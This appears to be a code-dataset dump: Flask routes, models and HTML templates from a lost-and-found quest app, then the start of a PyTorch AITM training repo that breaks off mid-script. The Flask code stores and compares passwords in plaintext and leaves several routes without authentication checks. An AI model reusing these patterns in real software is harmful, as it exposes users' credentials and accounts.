'POST':\n db.session.query(UserProfile) \\\n .filter(UserProfile.id == user.id). \\\n update({\"avatarId\": avatarId})\n db.session.commit()\n\n return redirect(url_for('profile_avatars'))\n\n\[email protected]('/profile/avatars/unlock/<avatarId>', methods=[\"GET\", \"POST\"])\ndef profile_avatars_unlock(avatarId):\n user = current_user\n if request.method == 'POST':\n userProfile = (db.session.query(UserProfile)\n .filter(user.id == UserProfile.id)\n .first())\n\n avatar = (db.session.query(Avatars)\n .filter(avatarId == Avatars.avatarId)\n .first())\n print(avatar)\n\n # if enough coins\n if userProfile.coinsBalance >= avatar.coinsRequired:\n db.session.query(UserProfile).filter(UserProfile.id == user.id). \\\n update({\"coinsBalance\": (UserProfile.coinsBalance - avatar.coinsRequired)})\n user_avatar = UserAvatars(avatarId=avatarId, userId=user.id)\n db.session.add(user_avatar)\n db.session.commit()\n\n return redirect(url_for('profile_avatars'))\n\n\[email protected]('/profile/badges')\ndef profile_badges():\n user = current_user\n userprofile = UserProfile.query.filter_by(id=user.id).first()\n\n return render_template('profile.html', user=user, userprofile=userprofile, page='badges')\n\n\[email protected]('/settings', methods=[\"GET\", \"POST\"])\ndef settings():\n user = current_user\n if request.method == 'POST':\n # take form data\n email = request.form['email']\n username = request.form['username']\n print(username)\n # Check if email format correct\n match = re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$', email)\n if match == None:\n # print('Bad Syntax')\n form = SignUpForm()\n return render_template('signup.html', form=form, err=\"invalid username or password\")\n # Check if email and username already in use\n userEmail = User.query.filter_by(email=email).first()\n userUsername = User.query.filter_by(username=username).first()\n if userEmail is not None and userUsername is not None:\n userprofile = UserProfile.query.filter_by(id=user.id).first()\n form = SignUpForm()\n form.username.data = user.username\n form.email.data = user.email\n return render_template('settings.html', user=user, userprofile=userprofile, form=form)\n\n # make changes to user in DB\n db.session.query(User) \\\n .filter(User.id == user.id). \\\n update({\"username\": username})\n\n db.session.query(User) \\\n .filter(User.id == user.id). 
\\\n update({\"email\": email})\n\n db.session.commit()\n return redirect(url_for('settings'))\n else:\n userprofile = UserProfile.query.filter_by(id=user.id).first()\n form = SignUpForm()\n form.username.data = user.username\n form.email.data = user.email\n return render_template('settings.html', user=user, userprofile=userprofile, form=form)\n\n\[email protected]('/login', methods=[\"GET\", \"POST\"])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n currUser = User.query.filter_by(username=username).first()\n\n # check if user exists in db and if password is correct\n if currUser is None or password != currUser.password:\n return render_template('login.html', form=form, err=\"Invalid username or password.\")\n user = currUser\n login_user(user, remember=user)\n flash(\"Log in successful!\")\n # print(user.email, user.username, user.password)\n return redirect(url_for('index'))\n else:\n return render_template('login.html', form=form)\n\n\[email protected]('/signup', methods=[\"GET\", \"POST\"])\ndef signup():\n form2 = SignUpForm()\n if request.method == 'POST':\n # else go to email, pass\n email = request.form['email']\n username = request.form['username']\n password = request.form['password']\n confirm = request.form['confirm']\n\n # Check if email format correct\n match = re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$', email)\n if match == None:\n return render_template('signup.html', form=form2, err=\"Invalid username or password.\")\n # Check if email and username already in use\n userEmail = User.query.filter_by(email=email).first()\n userUsername = User.query.filter_by(username=username).first()\n if userEmail is not None or userUsername is not None:\n return render_template('signup.html', form=form2, err=\"Username/email already exists.\")\n # Check if password equals confirm password\n if password != confirm:\n flash('Passwords do not match!')\n return render_template('signup.html', form=form2, err=\"Passwords do not match.\")\n\n # assign id to user\n already = True\n while already:\n id = 'U' + str(random.randint(1, 10001))\n # check if id exists in DB\n idcheck = (db.session.query(User.id)\n .filter(User.id == id)\n .first()\n )\n if idcheck is None:\n already = False\n\n user = User(id=id, email=email, password=password, username=username,\n created_at=datetime.now(pytz.timezone('Asia/Singapore'))\n )\n userprofile = UserProfile(id=id)\n user_avatar = UserAvatars(avatarId='0000', userId=id)\n login_user(user, remember=user)\n\n # store user in DB\n db.session.add(user)\n db.session.add(userprofile)\n db.session.add(user_avatar)\n db.session.commit()\n flash(\"Signup in successful!\")\n # print(User.query.all())\n return redirect(url_for('index'))\n else:\n return render_template('signup.html', form=form2)\n\n\[email protected]('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n# @app.route('/create')\n# def create():\n# # Create avatar data\n# avatar_data = [['0000', 'Eggsy(Default)', 0],\n# ['0001', 'Wilson', 25],\n# ['0002', 'Lady', 25],\n# ['0003', 'Rave', 50],\n# ['0004', 'Barry', 25],\n# ['0005', 'McDuck', 50],\n# ['0006', 'Coco Jumbo', 25],\n# ['0007', 'Wednesday', 50],\n# ['0008', 'P.Sherman', 25],\n# ['0009', 'Bluetterfly', 50],\n# ]\n#\n# for i in avatar_data:\n# u = Avatars(avatarId=i[0], name=i[1], 
coinsRequired=i[2])\n# db.session.add(u)\n#\n# # user_avatar = UserAvatars(avatarId='0001', userId='U22')\n# # db.session.add(user_avatar)\n# db.session.commit()\n\n # q = db.session.query(Avatars).all()\n # print(q)\n # print(q[0].name, q[0].avatarId)\n # return (str(q))\n # return ('avatars added')\n\n# @app.route('/money')\n# def money():\n# # give money etc\n# db.session.query(UserProfile).filter(UserProfile.id == current_user.id). \\\n# update({\"coinsBalance\": (UserProfile.coinsBalance + 200)})\n# db.session.commit()\n# return ('money given')\n#\n#\n# @app.route('/scrubComments')\n# def scrub():\n# # give money etc\n# # db.session.query(SeekComments) \\\n# # .filter(SeekComments.seekId == 'S9343') \\\n# # .filter(SeekComments.userId == current_user.id) \\\n# # .delete()\n# db.session.query(SeekCoinsTransaction) \\\n# .filter(SeekCoinsTransaction.userId == current_user.id) \\\n# .delete()\n#\n#\n# db.session.commit()\n# return ('comments deleted')\n\n\n# @app.route('/deleteUser')\n# def delete_user():\n# if (not current_user.is_anonymous):\n# # delete user\n# db.session.query(User) \\\n# .filter(User.id == current_user.id) \\\n# .delete()\n#\n# db.session.commit()\n# return ('user deleted')\n"
},
{
"alpha_fraction": 0.6896485686302185,
"alphanum_fraction": 0.7025158405303955,
"avg_line_length": 36.46043014526367,
"blob_id": "825756a65f00bee79319e2601a91fcb876d5f702",
"content_id": "2dbaac35863e24d5761470c0cf8bd0081eb3e136",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5207,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 139,
"path": "/app/models.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\nimport pytz\nfrom app import db, Base\nfrom sqlalchemy.sql import func\nfrom sqlalchemy import DateTime\nfrom flask_login import UserMixin\nfrom sqlalchemy import Column, Integer, String, ForeignKey\n\nimport random\n\n\nclass User(UserMixin, Base):\n __tablename__ = \"users\"\n\n id = db.Column(db.String, primary_key=True)\n email = db.Column(db.String(255), unique=True, nullable=False)\n password = db.Column(db.String(255), nullable=False)\n username = db.Column(db.String(255), unique=True, nullable=False)\n created_at = db.Column(DateTime(timezone=True))\n\n\nclass UserProfile(UserMixin, Base):\n __tablename__ = \"userProfile\"\n\n id = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n level = db.Column(db.Integer, nullable=False, default=1)\n coinsBalance = db.Column(db.Integer, nullable=False, default=50)\n coinsCollected = db.Column(db.Integer, nullable=False, default=0)\n coinsToNext = db.Column(db.Integer, nullable=False, default=20)\n avatarId = db.Column(db.String, ForeignKey('Avatars.avatarId'), default='0000')\n\n\nclass Quest(UserMixin, Base):\n __tablename__ = \"quests\"\n\n questId = db.Column(db.String, primary_key=True)\n reward = db.Column(db.Integer, nullable=False)\n item = db.Column(db.String(255), nullable=False)\n location = db.Column(db.String(255), nullable=False)\n description = db.Column(db.String(255))\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n posted_at = db.Column(DateTime(timezone=True))\n\n # State of quest. 0 for active, 1 for completed, 2 for deleted\n state = db.Column(db.Integer, nullable=False, default=0)\n # Type of quest. 0 for hero, 1 for side\n type = db.Column(db.Integer, nullable=False, default=0)\n # Is a featured quest. 
0 for false, 1 for true\n featured = db.Column(db.Integer, nullable=False, default=0)\n\n # Number of users before quest marked as completed\n totalSeekers = db.Column(db.Integer, nullable=False, default=1)\n\n\nclass Seek(UserMixin, Base):\n __tablename__ = \"seeks\"\n\n seekId = db.Column(db.String, primary_key=True)\n reward = db.Column(db.Integer, nullable=False)\n item = db.Column(db.String(255), nullable=False)\n location = db.Column(db.String(255), nullable=False)\n description = db.Column(db.String(255))\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n # 0 is active, 1 is completed, 2 is deleted/incomplete\n state = db.Column(db.Integer, nullable=False, default=0)\n posted_at = db.Column(DateTime(timezone=True))\n\n\nclass QuestsAccepted(UserMixin, Base):\n __tablename__ = \"questsAccepted\"\n\n questId = db.Column(db.String, ForeignKey('quests.questId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n\n\nclass SeeksAccepted(UserMixin, Base):\n __tablename__ = \"seeksAccepted\"\n\n seekId = db.Column(db.String, ForeignKey('seeks.seekId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n\n\nclass QuestCoinsTransaction(UserMixin, Base):\n __tablename__ = \"questCoinsTransaction\"\n\n questId = db.Column(db.String, ForeignKey('quests.questId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n coins = db.Column(db.Integer, nullable=False, default=0)\n completed_at = db.Column(DateTime(timezone=True))\n\n\nclass SeekCoinsTransaction(UserMixin, Base):\n __tablename__ = \"seekCoinsTransaction\"\n\n seekId = db.Column(db.String, ForeignKey('seeks.seekId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n coins = db.Column(db.Integer, nullable=False, default=0)\n completed_at = db.Column(DateTime(timezone=True))\n\n\nclass QuestComments(UserMixin, Base):\n __tablename__ = \"questComments\"\n\n commentId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n questId = db.Column(db.String, ForeignKey('quests.questId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n\n description = db.Column(db.String(255), nullable=False)\n # 0 is false, # 1 is true\n is_creator = db.Column(db.Integer, nullable=False, default=0)\n posted_at = db.Column(DateTime(timezone=True))\n\n\nclass SeekComments(UserMixin, Base):\n __tablename__ = \"seekComments\"\n\n commentId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n seekId = db.Column(db.String, ForeignKey('quests.questId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n\n description = db.Column(db.String(255))\n # 0 is false, # 1 is true\n is_creator = db.Column(db.Integer, nullable=False, default=0)\n posted_at = db.Column(DateTime(timezone=True))\n\n\nclass Avatars(UserMixin, Base):\n __tablename__ = \"Avatars\"\n\n avatarId = db.Column(db.String, primary_key=True)\n name = db.Column(db.String)\n coinsRequired = db.Column(db.Integer, default=0)\n\n\nclass UserAvatars(UserMixin, Base):\n __tablename__ = \"userAvatars\"\n\n avatarId = db.Column(db.String, primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n"
},
{
"alpha_fraction": 0.27248382568359375,
"alphanum_fraction": 0.2748938500881195,
"avg_line_length": 64.5216293334961,
"blob_id": "d8560a8bad261b51cdec197aed2de4f9d5c158aa",
"content_id": "b243979d3d87280dd7570a8d7f804f4f81dfb32c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 26155,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 393,
"path": "/app/templates/faq.html",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\r\n<html lang=\"zxx\">\r\n\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"description\" content=\"Queseek\">\r\n <meta name=\"keywords\" content=\"Queseek, quest, seek\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\r\n <title>Queseek</title>\r\n{% include \"base/icon.html\" %}\r\n <!-- Google Font -->\r\n <link href=\"https://fonts.googleapis.com/css?family=Muli:300,400,500,600,700,800,900&display=swap\" rel=\"stylesheet\">\r\n\r\n <!-- Css Styles -->\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/bootstrap.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/font-awesome.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/themify-icons.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/elegant-icons.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/owl.carousel.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/nice-select.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/jquery-ui.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/slicknav.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/style.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/table.css')}}\" type=\"text/css\">\r\n</head>\r\n\r\n<body>\r\n\r\n\r\n<!-- Page Preloder -->\r\n<div id=\"preloder\">\r\n <div class=\"loader\"></div>\r\n</div>\r\n\r\n<!-- Header Section Begin -->\r\n<header class=\"header-section\">\r\n\r\n {% include \"base/topbar.html\" %}\r\n {% include \"base/menu.html\" %}\r\n\r\n</header>\r\n<!-- Header End -->\r\n\r\n\r\n<!-- Hero Section Begin -->\r\n<section class=\"hero-section\">\r\n <div class=\"hero-items\">\r\n\r\n <div class=\"topbar-cover2\">\r\n <div class=\"desc\">\r\n\r\n <section class=\"cd-faq\">\r\n\r\n <div class=\"cd-faq-categories\">\r\n\r\n {% if page == 'points_system' %}\r\n <a href=\"{{url_for('faq_general')}}\">General</a>\r\n <a class=\"active\" href=\"{{url_for('faq_points_system')}}\">Points System</a>\r\n <a href=\"{{url_for('faq_seekers')}}\">Seekers</a>\r\n\r\n {% elif page == 'seekers' %}\r\n <a href=\"{{url_for('faq_general')}}\">General</a>\r\n <a href=\"{{url_for('faq_points_system')}}\">Points System</a>\r\n <a class=\"active\" href=\"{{url_for('faq_seekers')}}\">Seekers</a>\r\n\r\n {% else %}\r\n <a class=\"active\" href=\"{{url_for('faq_general')}}\">General</a>\r\n <a href=\"{{url_for('faq_points_system')}}\">Points System</a>\r\n <a href=\"{{url_for('faq_seekers')}}\">Seekers</a>\r\n\r\n\r\n {% endif %}\r\n </div>\r\n\r\n\r\n <!-- Faq Section Begin -->\r\n <div class=\"faq-section spad\">\r\n <div class=\"container\">\r\n <div class=\"row\">\r\n <div class=\"col-lg-12\">\r\n <div class=\"faq-accordin\">\r\n <div class=\"accordion\" id=\"accordionExample\">\r\n {% if page == 'points_system' %}\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseOne\">\r\n Points for Quests\r\n </a>\r\n </div>\r\n <div id=\"collapseOne\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div 
class=\"card-body\">\r\n <p>Hero Quests: (20 coins per post) -Limited to 3 posts of lost\r\n item(s) per user\r\n <br>Side Quests: (5 coins)- Eg: Errands such as printing\r\n notes / Collab\r\n <br>There are three levels of quests and this will affect\r\n the order the Quests\r\n are displayed on the Quest Home page. All quests are posted\r\n based on the time it\r\n was submitted (i.e. Most recent to older posts). The level 3\r\n will be displayed\r\n at the top while level 2 and level 1 below it.\r\n <br>*Level is dependent on the user who posts the quests.\r\n For Level 2 and 3 the\r\n user who post the quests will need to contribute their\r\n points according to the\r\n surplus of the level.\r\n\r\n\r\n Example:\r\n <br>Level 1 - 20 coins from system\r\n <br>Level 2 - 20 coins from system and 10 coins from the\r\n user.\r\n <br>Level 3 - 20 coins from system and 20 coins from the\r\n user.\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseTwo\">\r\n How about featured quests?\r\n </a>\r\n </div>\r\n <div id=\"collapseTwo\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>(Additional 5 coins on top of the existing points for the\r\n quests)\r\n <ul style=\"list-style-type: circle\">\r\n <li>Only limited to users based on the Top 20% weekly coins\r\n ranking.\r\n </li>\r\n <li>Each user can only attempt up to 3 featured quests in a\r\n week.\r\n </li>\r\n <li> First 5 users to complete the featured quest will get 5\r\n coins, the next 5\r\n will get 0.5x (2.5 coins)\r\n </li>\r\n </ul>\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n\r\n {% elif page == 'seekers' %}\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseOne\">\r\n What can I do with the coins?\r\n </a>\r\n </div>\r\n <div id=\"collapseOne\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Users can use the accumulated coins that they received from\r\n completing the quests\r\n for the following purpose:\r\n <ul style=\"list-style-type: circle;\">\r\n <li>The coins earned will help the user to level up. 
At a\r\n higher level, the user\r\n will have access to more quests.\r\n </li>\r\n <li>They can unlock a new avatar.</li>\r\n <li>The points can be used to change the level of the quests\r\n that the users\r\n posted.\r\n </li>\r\n </ul>\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseTwo\">\r\n Where can I check the quests that I have\r\n accepted?\r\n </a>\r\n </div>\r\n <div id=\"collapseTwo\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Seekers can go to their profile page and under it will show a\r\n list of quests that\r\n they have previously accepted.</p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseThree\">\r\n How should I verify the lost item(s) with the\r\n rightful owner?\r\n </a>\r\n </div>\r\n <div id=\"collapseThree\" class=\"collapse\"\r\n data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>In the event of a meetup, the rightful owner should either\r\n have a prove of\r\n identification that the item belongs to him/her or the\r\n description of the lost\r\n item(s) provided by the seekers should accurately matched\r\n with the information\r\n given by the owner of lost item(s).</p>\r\n </div>\r\n </div>\r\n </div>\r\n {% else %}\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseOne\">\r\n What is Queseek?\r\n </a>\r\n </div>\r\n <div id=\"collapseOne\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Queseek is a platform that builds a community of people by\r\n completing different\r\n types of quests together.\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseTwo\">\r\n What are the different types of quests and\r\n seeks?\r\n </a>\r\n </div>\r\n <div id=\"collapseTwo\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>There are two types of quests: Hero Quests and Side Quests.\r\n <br>\r\n Hero Quests are quest posted by people who have reported\r\n their\r\n item\r\n as lost.\r\n <br>\r\n Side Quests are interactive mini-games that users can take\r\n part\r\n in\r\n to earn some\r\n bonus points.\r\n <br>\r\n The two type of side quests are Collaborative based and\r\n Community\r\n based.\r\n <br>\r\n <ul style=\"list-style-type:disc\">\r\n <li>Collaborative Based: Companies & Administrators posts\r\n quests\r\n such as finding\r\n QR code around campus.\r\n </li>\r\n <li>Community Based: Helping other students to run errands\r\n in\r\n school\r\n such as\r\n printing lecture notes or buying takeaways.\r\n </li>\r\n </ul>\r\n\r\n <br>\r\n Seeks are the list of found items that have been reported to the\r\n system.\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseThree\">\r\n What are featured quests?\r\n </a>\r\n </div>\r\n <div id=\"collapseThree\" class=\"collapse\"\r\n data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>They are quests that have been featured by the moderators of\r\n Queseek.\r\n These\r\n quests are usually available for a limited time only as a\r\n collaborations with\r\n other organisation or for an event. 
Featured quests will\r\n have\r\n bonus\r\n points\r\n available for uses to earn.</p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseFour\">\r\n I have lost my belongings. What should I do?\r\n </a>\r\n </div>\r\n <div id=\"collapseFour\" class=\"collapse\"\r\n data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Firstly, users can browse through the Seek reported to see if\r\n their\r\n item have\r\n already been found by others are are already reported on the\r\n website. If the\r\n user can’t find any listing of their item, they can post a\r\n Quest\r\n report.\r\n <br>Simply click on the “Report your lost item” button on\r\n the\r\n right\r\n hand side of\r\n the page to submit a report.</p>\r\n </div>\r\n </div>\r\n </div>\r\n\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseFive\">\r\n I found an item in school. What can I do?\r\n </a>\r\n </div>\r\n <div id=\"collapseFive\" class=\"collapse\"\r\n data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Simply click on the “Report a seek” button on our home page,\r\n fill\r\n up\r\n the form and\r\n submit it!\r\n Fill up the basic information of the item you found and\r\n double\r\n check\r\n with the\r\n owner for the specific information such as “What cards are\r\n in\r\n the\r\n wallet?”\r\n before returning it to the owner. If you are not available\r\n to\r\n meet\r\n up with the\r\n owner, you may pass the item to the security counter of the\r\n school.</p>\r\n </div>\r\n </div>\r\n </div>\r\n\r\n\r\n {% endif %}\r\n\r\n\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n\r\n\r\n <!-- Faq Section End -->\r\n\r\n\r\n </section>\r\n\r\n\r\n </div>\r\n </div>\r\n\r\n\r\n </div>\r\n</section>\r\n\r\n\r\n<!-- Hero Section End -->\r\n\r\n<!-- Js Plugins -->\r\n<script src=\"{{url_for('static', filename='js/jquery-3.3.1.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/bootstrap.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery-ui.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.countdown.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.nice-select.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.zoom.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.dd.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.slicknav.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/main.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/table.js')}}\"></script>\r\n</body>\r\n\r\n</html>"
},
{
"alpha_fraction": 0.47862231731414795,
"alphanum_fraction": 0.48099762201309204,
"avg_line_length": 26,
"blob_id": "8498ebf0bb5b66f23c426f50f7f159a68bb83471",
"content_id": "1b9f8b65ac903c8512770724b373ffe84369f169",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 842,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 31,
"path": "/app/templates/base/loginlogout.html",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "<div class=\"ht-right\">\n\n <div class=\"login-panel\">\n\n {% if current_user.is_anonymous %}\n\n <a href=\"{{ url_for('signup') }} \" class=\"log-btn\">SIGN UP</a>\n <a href=\"{{ url_for('login') }} \" class=\"log-btn\">LOG IN</a>\n\n {% else %}\n\n <a href=\"{{ url_for('logout') }}\" class=\"log-btn\">LOG OUT</a>\n <a href=\"{{ url_for('settings') }}\" class=\"settings-btn\">SETTINGS</a>\n {% endif %}\n\n </div>\n\n {% if current_user.is_anonymous %}\n {% else %}\n <div class=\"login-panel\">\n <a href=\"{{url_for('profile')}}\">\n <img src=\"{{ url_for('static', filename='img/avatars/'+current_user_avatar+'.png')}}\"\n width=\"50\">\n </a>\n\n <a href=\"{{ url_for('profile') }}\" class=\"user-btn\"> {{ current_user.username }}</a>\n </div>\n {% endif %}\n\n\n</div>\n\n\n\n\n\n"
}
] | 10 |
rockyzhengwu/AITM-torch | https://github.com/rockyzhengwu/AITM-torch | c877487bad0aaf0d5bb0686f0f40c26e9a5f858a | 674b5bbef50b5f7c96dc3a70d88a90ddd25c9ce8 | 78e82ffd7be8a7c7aa9fa91437ad75e99efcc14d | refs/heads/master | 2023-07-11T04:37:13.151772 | 2021-08-19T02:29:28 | 2021-08-19T02:29:28 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7441860437393188,
"alphanum_fraction": 0.7545219659805298,
"avg_line_length": 28.769229888916016,
"blob_id": "210270dbfd4758b26a5d270c7484a23c482ef4ea",
"content_id": "5d3bd38c2621d05746066c110b0d047de3bc5b9e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 387,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 13,
"path": "/dataset_test.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "from torch.utils.data import DataLoader\nfrom dataset import XDataset\n\ndatafile = './data/ctr_cvr.dev'\ndataset = XDataset(datafile)\n\ndataloader = DataLoader(dataset, batch_size=1000, shuffle=False)\nfor i, value in enumerate(dataloader):\n click, conversion, features = value\n print(click.shape)\n print(conversion.shape)\n for key in features.keys():\n print(key, features[key].shape)\n"
},
{
"alpha_fraction": 0.554428219795227,
"alphanum_fraction": 0.5874022245407104,
"avg_line_length": 27.329341888427734,
"blob_id": "0edd073394efca02fbf676758377e00dc8630888",
"content_id": "ded384b7f4a10d66631ec8305e828b0cc1215df7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4731,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 167,
"path": "/train.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "import sys\nimport random\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nimport dataset\nfrom model import AITM\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\n\n\n# super parameter\nbatch_size = 2000\nembedding_size = 5\nlearning_rate = 0.0001\ntotal_epoch = 10\nearlystop_epoch = 1\n\nvocabulary_size = {\n '101': 238635,\n '121': 98,\n '122': 14,\n '124': 3,\n '125': 8,\n '126': 4,\n '127': 4,\n '128': 3,\n '129': 5,\n '205': 467298,\n '206': 6929,\n '207': 263942,\n '216': 106399,\n '508': 5888,\n '509': 104830,\n '702': 51878,\n '853': 37148,\n '301': 4\n}\n\nmodel_file = './out/AITM.model'\n\n\ndef get_dataloader(filename, batch_size, shuffle):\n data = dataset.XDataset(filename)\n loader = DataLoader(data, batch_size=batch_size, shuffle=shuffle)\n return loader\n\n\ndef train():\n train_dataloader = get_dataloader('./data/ctr_cvr.train',\n batch_size,\n shuffle=True)\n dev_dataloader = get_dataloader('./data/ctr_cvr.dev',\n batch_size,\n shuffle=True)\n model = AITM(vocabulary_size, embedding_size)\n device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n optimizer = torch.optim.Adam(model.parameters(),\n lr=learning_rate,\n weight_decay=1e-6)\n model.to(device)\n best_acc = 0.0\n earystop_count = 0\n best_epoch = 0\n for epoch in range(total_epoch):\n total_loss = 0.\n nb_sample = 0\n # train\n model.train()\n for step, batch in enumerate(train_dataloader):\n click, conversion, features = batch\n for key in features.keys():\n features[key] = features[key].to(device)\n click_pred, conversion_pred = model(features)\n loss = model.loss(click.float(),\n click_pred,\n conversion.float(),\n conversion_pred,\n device=device)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n total_loss += loss\n nb_sample += click.shape[0]\n if step % 200 == 0:\n print('[%d] Train loss on step %d: %.6f' %\n (nb_sample, (step + 1), total_loss / (step + 1)))\n\n # validation\n print(\"start validation...\")\n click_pred = []\n click_label = []\n conversion_pred = []\n conversion_label = []\n model.eval()\n for step, batch in enumerate(dev_dataloader):\n click, conversion, features = batch\n for key in features.keys():\n features[key] = features[key].to(device)\n\n with torch.no_grad():\n click_prob, conversion_prob = model(features)\n\n click_pred.append(click_prob.cpu())\n conversion_pred.append(conversion_prob.cpu())\n\n click_label.append(click)\n conversion_label.append(conversion)\n\n click_auc = cal_auc(click_label, click_pred)\n conversion_auc = cal_auc(conversion_label, conversion_pred)\n print(\"Epoch: {} click_auc: {} conversion_auc: {}\".format(\n epoch + 1, click_auc, conversion_auc))\n\n acc = click_auc + conversion_auc\n if best_acc < acc:\n best_acc = acc\n best_epoch = epoch + 1\n torch.save(model.state_dict(), model_file)\n earystop_count = 0\n else:\n print(\"train stop at Epoch %d based on the base validation Epoch %d\" 